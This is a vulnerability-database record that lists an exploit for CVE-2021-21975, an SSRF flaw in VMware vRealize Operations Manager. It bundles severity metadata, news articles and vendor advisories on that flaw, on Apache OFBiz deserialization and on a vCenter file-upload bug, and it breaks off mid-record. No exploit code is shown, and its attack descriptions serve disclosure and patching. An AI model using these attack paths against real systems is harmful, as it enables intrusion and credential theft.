Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager

2021-04-01T01:14:20

Description

## 0x01 注该项目仅供合法的渗透测试以及爱好者参考学习，请各位遵守《中华人民共和国网络安全法》以及相应地方的法律，禁止使...

{"id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "description": "## 0x01 \u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "published": "2021-04-01T01:14:20", "modified": "2022-03-25T11:15:15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "immutableFields": [], "lastseen": "2022-03-25T19:01:57", "viewCount": 38, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:274E3983-7823-4CD0-B47C-0EBC25DD5646", "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:9A355845-4C8F-48C3-9829-4A54539E1FB8", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0245", "CPAI-2021-0267", "CPAI-2021-0728", "CPAI-2021-1066"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2", "CISA:D9F4EE6727B9BF3A40025E9D70945311"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"]}, {"type": "githubexploit", "idList": ["1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "29FE8BBC-6003-591C-8E89-6836D0994CF1", "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "35114B1B-006F-5732-8E42-9E8643B61C2A", "44857A61-F0F0-54D6-AB53-4F157029BBC2", "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "6259E530-C5D5-5A0A-8EDD-D07ADFD93494", "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "97046A6F-8428-5DCF-88B4-4101351D637C", "9B660139-27C8-56B8-B9E2-8124D0E9F502", "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "C43D1529-7393-5DA8-AEA7-4ED3D87FB150", "D5702470-2A4B-5116-9B9F-4001BDD6935C", "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "DFD57FC3-633C-5613-9AAB-EFE75EBB4A9C"]}, {"type": "hivepro", "idList": ["HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-APACHE_OFBIZ_DESERIALIZATION_SOAP-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-"]}, {"type": "nessus", "idList": ["APACHE_OFBIZ_CVE-2021-26295.NBIN", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VCENTER_CVE-2021-22005.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162104", "PACKETSTORM:162349", "PACKETSTORM:164439"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "seebug", "idList": ["SSV:99163", "SSV:99173"]}, {"type": "thn", "idList": ["THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "THN:4640BEB83FE3611B6867B05878F52F0D", "THN:6E0EE4DB2DB83F27194AFC50774789BB"]}, {"type": "threatpost", "idList": ["THREATPOST:14DD6B793DC77F25538436F7D14C922B", "THREATPOST:52B3DE7108A575C635073D53A3E635EE", "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "THREATPOST:CD203B10BCB138850F42815F74C8A5AF"]}, {"type": "vmware", "idList": ["VMSA-2021-0004.1", "VMSA-2021-0004.2", "VMSA-2021-0020", "VMSA-2021-0020.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-36080", "1337DAY-ID-36160", "1337DAY-ID-36874"]}]}, "score": {"value": 8.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:274E3983-7823-4CD0-B47C-0EBC25DD5646", "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0245", "CPAI-2021-0267"]}, {"type": "cisa", "idList": ["CISA:D9F4EE6727B9BF3A40025E9D70945311"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"]}, {"type": "githubexploit", "idList": ["29FE8BBC-6003-591C-8E89-6836D0994CF1", "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "hivepro", "idList": ["HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/"]}, {"type": "nessus", "idList": ["APACHE_OFBIZ_CVE-2021-26295.NBIN", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162104", "PACKETSTORM:162349"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "seebug", "idList": ["SSV:99163", "SSV:99173"]}, {"type": "thn", "idList": ["THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "THN:4640BEB83FE3611B6867B05878F52F0D", "THN:6E0EE4DB2DB83F27194AFC50774789BB"]}, {"type": "threatpost", "idList": ["THREATPOST:14DD6B793DC77F25538436F7D14C922B", "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "vmware", "idList": ["VMSA-2021-0020.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-36160"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-21975", "epss": "0.974910000", "percentile": "0.999460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-22005", "epss": "0.974180000", "percentile": "0.998570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26295", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-17"}], "vulnersScore": 8.8}, "_state": {"dependencies": 1660004461, "score": 1684011499, "epss": 1679157345}, "_internal": {"score_hash": "3aa5ea51ea7e08dfe7b6d826d1a0e453"}, "privateArea": 1}

{"thn": [{"lastseen": "2022-05-09T12:38:25", "description": "[![](https://thehackernews.com/images/-LDB-BP0jSCE/YFhWXTlt8RI/AAAAAAAACE4/4B6vBoblUS0ASitb0c4CfQMec8zUUApdQCLcBGAsYHQ/s0/apche-erp-software.jpg)](<https://thehackernews.com/images/-LDB-BP0jSCE/YFhWXTlt8RI/AAAAAAAACE4/4B6vBoblUS0ASitb0c4CfQMec8zUUApdQCLcBGAsYHQ/s0/apche-erp-software.jpg>)\n\nThe Apache Software Foundation on Friday addressed a high severity vulnerability in Apache OFBiz that could have allowed an unauthenticated adversary to remotely seize control of the open-source enterprise resource planning (ERP) system.\n\nTracked as [CVE-2021-26295](<https://issues.apache.org/jira/browse/OFBIZ-12167>), the flaw affects all versions of the software prior to [17.12.06](<https://issues.apache.org/jira/browse/OFBIZ-12195?jql=project%20%3D%20OFBIZ%20AND%20fixVersion%20%3D%2017.12.06>) and employs an \"unsafe deserialization\" as an attack vector to permit unauthorized remote attackers to execute arbitrary code on a server directly.\n\n[OFBiz](<https://en.wikipedia.org/wiki/Apache_OFBiz>) is a Java-based web framework for automating enterprise processes and offers a wide range of functionality, including accounting, customer relationship management, manufacturing operations management, order management, supply chain fulfillment, and warehouse management system, among others.\n\nSpecifically, by exploiting this flaw, a malicious party can tamper with serialized data to insert arbitrary code that, when deserialized, can potentially result in remote code execution.\n\n\"An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz,\" OFBiz developer Jacques Le Roux [noted](<https://seclists.org/oss-sec/2021/q1/255>).\n\nUnsafe deserialization has been a [source of data integrity](<https://snyk.io/blog/serialization-and-deserialization-in-java/>) and other security issues, with the Open Web Application Security Project (OWASP) [noting](<https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data>) that \"data which is untrusted cannot be trusted to be well formed, [and that] malformed data or unexpected data could be used to abuse application logic, deny service, or execute arbitrary code, when deserialized.\"\n\nr00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi'anxin Group, and Longofo at Knownsec 404 Team have been credited with reporting the vulnerability.\n\nIt's recommended to upgrade Apache OFBiz to the [latest version](<https://ofbiz.apache.org/download.html>) (17.12.06) to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T08:34:00", "type": "thn", "title": "Critical RCE Vulnerability Found in Apache OFBiz ERP Software\u2014Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-03-22T08:34:44", "id": "THN:6E0EE4DB2DB83F27194AFC50774789BB", "href": "https://thehackernews.com/2021/03/critical-rce-vulnerability-found-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:23", "description": "[![](https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg)](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "[![vCenter Server](https://thehackernews.com/images/-EJ9u76MmCUI/YUqeTrQNNsI/AAAAAAAAD2Q/9-DR1JzBdMUg23AZ7ggcnbJqj4DkD4piQCLcBGAsYHQ/s728-e1000/vmware-patch-update.jpg)](<https://thehackernews.com/images/-EJ9u76MmCUI/YUqeTrQNNsI/AAAAAAAAD2Q/9-DR1JzBdMUg23AZ7ggcnbJqj4DkD4piQCLcBGAsYHQ/s0/vmware-patch-update.jpg>)\n\nVMware on Tuesday published a new bulletin warning of as many as 19 vulnerabilities in vCenter Server and Cloud Foundation appliances that a remote attacker could exploit to take control of an affected system.\n\nThe most urgent among them is an arbitrary file upload vulnerability in the Analytics service (CVE-2021-22005) that impacts vCenter Server 6.7 and 7.0 deployments. \"A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file,\" the company [noted](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), [adding](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) \"this vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.\"\n\nAlthough VMware has published [workarounds](<https://kb.vmware.com/s/article/85717>) for the flaw, the company cautioned that they are \"meant to be a temporary solution until updates [\u2026] can be deployed.\"\n\nThe complete list of flaws patched by the virtualization services provider is as follows \u2014\n\n * **CVE-2021-22005** (CVSS score: 9.8) - vCenter Server file upload vulnerability\n * **CVE-2021-21991** (CVSS score: 8.8) - vCenter Server local privilege escalation vulnerability\n * **CVE-2021-22006** (CVSS score: 8.3) - vCenter Server reverse proxy bypass vulnerability\n * **CVE-2021-22011** (CVSS score: 8.1) - vCenter server unauthenticated API endpoint vulnerability\n * **CVE-2021-22015** (CVSS score: 7.8) - vCenter Server improper permission local privilege escalation vulnerabilities\n * **CVE-2021-22012** (CVSS score: 7.5) - vCenter Server unauthenticated API information disclosure vulnerability\n * **CVE-2021-22013** (CVSS score: 7.5) - vCenter Server file path traversal vulnerability\n * **CVE-2021-22016** (CVSS score: 7.5) - vCenter Server reflected XSS vulnerability\n * **CVE-2021-22017** (CVSS score: 7.3) - vCenter Server rhttpproxy bypass vulnerability\n * **CVE-2021-22014** (CVSS score: 7.2) - vCenter Server authenticated code execution vulnerability\n * **CVE-2021-22018** (CVSS score: 6.5) - vCenter Server file deletion vulnerability\n * **CVE-2021-21992** (CVSS score: 6.5) - vCenter Server XML parsing denial-of-service vulnerability\n * **CVE-2021-22007** (CVSS score: 5.5) - vCenter Server local information disclosure vulnerability\n * **CVE-2021-22019** (CVSS score: 5.3) - vCenter Server denial of service vulnerability\n * **CVE-2021-22009** (CVSS score: 5.3) - vCenter Server VAPI multiple denial of service vulnerabilities\n * **CVE-2021-22010** (CVSS score: 5.3) - vCenter Server VPXD denial of service vulnerability\n * **CVE-2021-22008** (CVSS score: 5.3) - vCenter Server information disclosure vulnerability\n * **CVE-2021-22020** (CVSS score: 5.0) - vCenter Server Analytics service denial-of-service vulnerability\n * **CVE-2021-21993** (CVSS score: 4.3) - vCenter Server SSRF vulnerability\n\nCredited with reporting most of the flaws are George Noseevich and Sergey Gerasimov of SolidLab LLC, alongside Hynek Petrak of Schneider Electric, Yuval Lazar of Pentera, and Osama Alaa of Malcrove.\n\n\"The ramifications of [CVE-2021-22005] are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available,\" VMware [said](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) in an FAQ urging customers to immediately update their vCenter installations.\n\n\"With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spear-phishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\" the company added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T03:09:00", "type": "thn", "title": "VMware Warns of Critical File Upload Vulnerability Affecting vCenter Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-22T03:22:09", "id": "THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "href": "https://thehackernews.com/2021/09/vmware-warns-of-critical-file-upload.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:18", "description": "An insecure deserialization vulnerability exists in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "checkpoint_advisories", "title": "Apache OFBiz Insecure Deserialization(CVE-2021-26295)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-28T00:00:00", "id": "CPAI-2021-0267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:20", "description": "An insecure deserialization vulnerability exists in Apache OFBiz. This vulnerability is due to Java serialization issues when processing requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-12T00:00:00", "type": "checkpoint_advisories", "title": "Apache OFBiz Insecure Deserialization (CVE-2021-26295)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-06-20T00:00:00", "id": "CPAI-2021-0245", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-23T23:31:36", "description": "A sever-side request forgery vulnerability exists in VMware vRealize Operations Manager. Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:32:54", "description": "An arbitrary file upload vulnerability exists in VMWare vCenter Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 